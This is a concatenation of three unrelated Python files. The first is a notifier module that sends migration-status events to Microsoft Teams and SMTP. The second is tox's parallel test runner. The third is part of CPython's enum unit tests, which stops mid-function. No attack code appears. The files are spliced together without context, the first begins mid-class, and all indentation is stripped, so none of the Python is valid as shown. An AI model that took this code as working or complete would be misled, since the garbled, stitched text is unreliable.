""" Data class containing all available Notifiers """
_bag: Dict[str, CanNotify] = {}
def add(self, notifier: CanNotify):
self._bag[notifier.get_name()] = notifier
def get(self, notifier_name: str):
if notifier_name not in self._bag:
return None
return self._bag[notifier_name]
def get_all(self):
return self._bag
class Notifier:
""" Handles all kind of notifications """
AGENT_INSTALLED = 'AgentInstalled'
ESTIMATION_DONE = 'EstimationDone'
POST_LAUNCH_SCRIPTS_UPDATED = 'PostLaunchScriptsUpdated'
REPLICATION_DONE = 'ReplicationDone'
TEST_TARGETS_READY = 'TestTargetsReady'
CUTOVER_TARGETS_READY = 'CutoverTargetsReady'
AGENT_INSTALLED_MESSAGE = 'The CloudEndure agent is now installed for the server {} in the {} project.'
ESTIMATION_DONE_MESSAGE = '{}'
POST_LAUNCH_SCRIPTS_UPDATED_MESSAGE = 'The post launch scripts has been copied on the servers of the {} project.'
REPLICATION_DONE_MESSAGE = 'The initial replication for all the servers in the {} project is done.'
TEST_TARGETS_READY_MESSAGE = 'Test targets of the {} project are up and running.'
CUTOVER_TARGETS_READY_MESSAGE = 'Cutover targets of the {} project are up and running.'
ALL_EVENTS = {
AGENT_INSTALLED: AGENT_INSTALLED_MESSAGE,
POST_LAUNCH_SCRIPTS_UPDATED: POST_LAUNCH_SCRIPTS_UPDATED_MESSAGE,
REPLICATION_DONE: REPLICATION_DONE_MESSAGE,
TEST_TARGETS_READY: TEST_TARGETS_READY_MESSAGE,
CUTOVER_TARGETS_READY: CUTOVER_TARGETS_READY_MESSAGE,
ESTIMATION_DONE: ESTIMATION_DONE_MESSAGE,
}
_notifier_bag: NotifierBag = None
_enabled_notifiers: List[str] = []
def __init__(self, config: dict):
# Don't forget to add any new Notifier implementation to the Notifier bag.
# This is because we don't have a dependency injection framework
self._notifier_bag = NotifierBag()
self._notifier_bag.add(TeamsNotifier(config[TeamsNotifier.NAME]))
self._notifier_bag.add(SMTPNotifier(config[SMTPNotifier.NAME]))
self._notifier_bag.add(NullNotifier())
self._enabled_notifiers = config['enabled_notifiers']
def notify(self, event: str, message: str):
if event not in self.ALL_EVENTS:
logging.getLogger('error').error(
'{}: “{}” is not a authorized event. Cancelling notifications.'.format(self.__class__.__name__, event)
)
return
self._do_notify(event, message)
def _do_notify(self, event: str, message: str):
tasks = []
for notifier_name, notifier in self._notifier_bag.get_all().items():
if notifier_name not in self._enabled_notifiers:
continue
task = Thread(target=notifier.notify, args=[event, self._clean_message(message)])
task.start()
tasks.append(task)
for task in tasks:
task.join()
@classmethod
def _clean_message(cls, message: str) -> str:
# Remove bash formatting
return re.sub(r'\[.*?;?.*?m', '', message, re.MULTILINE)
class NullNotifier(CanNotify):
""" Dummy Notifier that does nothing (example) """
NAME = 'null'
def get_name(self):
return self.NAME
def notify(self, event: str, message: str):
logging.getLogger('root').debug("{}: Notify “{}” with message: “{}”.".format(
self.__class__.__name__, event, message
))
# Allows to test concurrency
time.sleep(0.1)
class TeamsNotifier(CanNotify):
""" Handles notification to Microsoft Teams """
NAME = 'teams'
_webook_urls: List[str] = []
_send_event_decider: SendEventDecider = None
def __init__(self, config: dict):
self._webook_urls = config['webhook_urls']
self._send_event_decider = SendEventDecider(config['event_whitelist'], config['event_blacklist'])
def get_name(self):
return self.NAME
def notify(self, event: str, message: str):
if not self._send_event_decider.should_send(event):
return
if len(self._webook_urls) > 10:
logging.getLogger('root').warning(
'{}: More than 10 webhooks were configured. Be cautious of rate limits.'.format(
self.__class__.__name__)
)
tasks = []
for webhook_url in self._webook_urls:
if not validators.url(webhook_url):
logging.getLogger('error').error(
'{}: “{}” is not a valid URL.'.format(self.__class__.__name__, webhook_url)
)
task = Thread(target=self._do_notify, args=[webhook_url, message])
task.start()
tasks.append(task)
for task in tasks:
task.join()
def _do_notify(self, webhook_url: str, message: str):
logging.getLogger('root').debug("{}: Sending message: {}\n to: {}".format(
self.__class__.__name__, message, webhook_url
))
teams_connector = pymsteams.connectorcard(webhook_url)
teams_connector.text(message)
teams_connector.send()
class SMTPNotifier(CanNotify):
""" Handles notification by email with SMTP """
NAME = 'smtp'
_destination_emails: List[str] = []
_send_event_decider: SendEventDecider = None
_needs_authentication: bool = None
_username: str = None
_password: str = None
_host: str = None
_port: int = None
_tls: bool = None
def __init__(self, config: dict):
self._needs_authentication = self._get_config_value(config, 'needs_authentication', False)
self._host = self._get_config_value(config, 'host', '127.0.0.1', 'MF_NOTIFIER_SMTP_HOST')
self._port = self._get_config_value(config, 'port', 465, 'MF_NOTIFIER_SMTP_PORT')
self._tls = self._get_config_value(config, 'tls', True, 'MF_NOTIFIER_SMTP_TLS')
self._destination_emails = self._get_config_value(config, 'destination_emails', [])
self._event_whitelist = config['event_whitelist']
self._event_blacklist = config['event_blacklist']
self._send_event_decider = SendEventDecider(whitelist=self._event_whitelist, blacklist=self._event_blacklist)
if self._needs_authentication:
self._username = EnvironmentVariableFetcher.fetch(['MF_NOTIFIER_SMTP_USERNAME'], '[Notify SMTP] Username')
self._password = EnvironmentVariableFetcher.fetch(
env_var_names=['MF_NOTIFIER_SMTP_PASSWORD'],
env_var_description='[Notify SMTP] Password',
sensitive=True
)
def get_name(self):
return self.NAME
def notify(self, event: str, message: str):
if not self._send_event_decider.should_send(event):
return
if not self._check_destination_emails():
return
email_message = EmailMessage()
email_message.set_content(message + "\n\nThis message was sent by {}.".format(BRAND))
email_message['Subject'] = '[' + BRAND + '] ' + message
email_message['To'] = ', '.join(self._destination_emails)
if self._needs_authentication:
email_message['From'] = self._username
else:
email_message['From'] = BRAND
if not self._tls:
smtp_client = smtplib.SMTP(self._host, self._port)
else:
smtp_client = smtplib.SMTP_SSL(self._host, self._port)
if self._needs_authentication:
smtp_client.login(self._username, self._password)
logging.getLogger('root').debug("{}: Sending SMTP message: {}".format(
self.__class__.__name__, str(email_message)
))
smtp_client.send_message(email_message)
smtp_client.quit()
@classmethod
def _get_config_value(cls, config: dict, key: str, default, env_var_name: str = None):
value = None
if key not in config or config[key] is None or config[key] == '':
if env_var_name is not None:
value = EnvironmentVariableFetcher.fetch(
env_var_names=[env_var_name], env_var_description=env_var_name)
else:
value = config[key]
if not value:
return default
return value
def _check_destination_emails(self):
for email in self._destination_emails:
if not validators.email(email):
logging.getLogger('error').error(
'{}: “{}” is not a valid email. Cancelling notifications.'.format(self.__class__.__name__, email)
)
return False
return True
if __name__ == '__main__':
print("This file is a library file. It cannot be called directly.")
|
parallel.py
|
import os
import sys
from collections import OrderedDict, deque
from threading import Event, Semaphore, Thread
from tox import reporter
from tox.config.parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from tox.config.parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from tox.exception import InvocationError
from tox.util.main import MAIN_FILE
from tox.util.spinner import Spinner
def run_parallel(config, venv_dict):
"""here we'll just start parallel sub-processes"""
live_out = config.option.parallel_live
disable_spinner = bool(os.environ.get("TOX_PARALLEL_NO_SPINNER") == "1")
args = [sys.executable, MAIN_FILE] + config.args
try:
position = args.index("--")
except ValueError:
position = len(args)
max_parallel = config.option.parallel
if max_parallel is None:
max_parallel = len(venv_dict)
semaphore = Semaphore(max_parallel)
finished = Event()
show_progress = (
not disable_spinner and not live_out and reporter.verbosity() > reporter.Verbosity.QUIET
)
with Spinner(enabled=show_progress) as spinner:
def run_in_thread(tox_env, os_env, processes):
output = None
env_name = tox_env.envconfig.envname
status = "skipped tests" if config.option.notest else None
try:
os_env[str(PARALLEL_ENV_VAR_KEY_PRIVATE)] = str(env_name)
os_env[str(PARALLEL_ENV_VAR_KEY_PUBLIC)] = str(env_name)
args_sub = list(args)
if hasattr(tox_env, "package"):
args_sub.insert(position, str(tox_env.package))
args_sub.insert(position, "--installpkg")
if tox_env.get_result_json_path():
result_json_index = args_sub.index("--result-json")
args_sub[result_json_index + 1] = "{}".format(tox_env.get_result_json_path())
with tox_env.new_action("parallel {}".format(tox_env.name)) as action:
def collect_process(process):
processes[tox_env] = (action, process)
print_out = not live_out and tox_env.envconfig.parallel_show_output
output = action.popen(
args=args_sub,
env=os_env,
redirect=not live_out,
capture_err=print_out,
callback=collect_process,
returnout=print_out,
)
except InvocationError as err:
status = "parallel child exit code {}".format(err.exit_code)
finally:
semaphore.release()
finished.set()
tox_env.status = status
done.add(env_name)
outcome = spinner.succeed
if config.option.notest:
outcome = spinner.skip
elif status is not None:
outcome = spinner.fail
outcome(env_name)
if print_out and output is not None:
reporter.verbosity0(output)
threads = deque()
processes = {}
todo_keys = set(venv_dict.keys())
todo = OrderedDict((n, todo_keys & set(v.envconfig.depends)) for n, v in venv_dict.items())
done = set()
try:
while todo:
for name, depends in list(todo.items()):
if depends - done:
# skip if has unfinished dependencies
continue
del todo[name]
venv = venv_dict[name]
semaphore.acquire(blocking=True)
spinner.add(name)
thread = Thread(
target=run_in_thread, args=(venv, os.environ.copy(), processes)
)
thread.daemon = True
thread.start()
threads.append(thread)
if todo:
# wait until someone finishes and retry queuing jobs
finished.wait()
finished.clear()
while threads:
threads = [
thread for thread in threads if not thread.join(0.1) and thread.is_alive()
]
except KeyboardInterrupt:
reporter.verbosity0(
"[{}] KeyboardInterrupt parallel - stopping children".format(os.getpid())
)
while True:
# do not allow to interrupt until children interrupt
try:
# putting it inside a thread so it's not interrupted
stopper = Thread(target=_stop_child_processes, args=(processes, threads))
stopper.start()
stopper.join()
except KeyboardInterrupt:
continue
raise KeyboardInterrupt
def _stop_child_processes(processes, main_threads):
"""A three level stop mechanism for children - INT (250ms) -> TERM (100ms) -> KILL"""
# first stop children
def shutdown(tox_env, action, process):
action.handle_interrupt(process)
threads = [Thread(target=shutdown, args=(n, a, p)) for n, (a, p) in processes.items()]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# then its threads
for thread in main_threads:
thread.join()
|
test_enum.py
|
import enum
import inspect
import pydoc
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from datetime import timedelta
try:
import threading
except ImportError:
threading = None
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
try:
class StrEnum(str, Enum):
'accepts only string values'
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
except Exception as exc:
Name = exc
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertWarns(DeprecationWarning):
self.assertNotIn(3, Season)
with self.assertWarns(DeprecationWarning):
self.assertNotIn('AUTUMN', Season)
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_member_contains(self):
self.assertRaises(TypeError, lambda: 'test' in self.Season.AUTUMN)
self.assertRaises(TypeError, lambda: 3 in self.Season.AUTUMN)
self.assertRaises(TypeError, lambda: 'AUTUMN' in self.Season.AUTUMN)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_format_enum_custom(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited(self):
class StrEnum(str, Enum):
pass
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
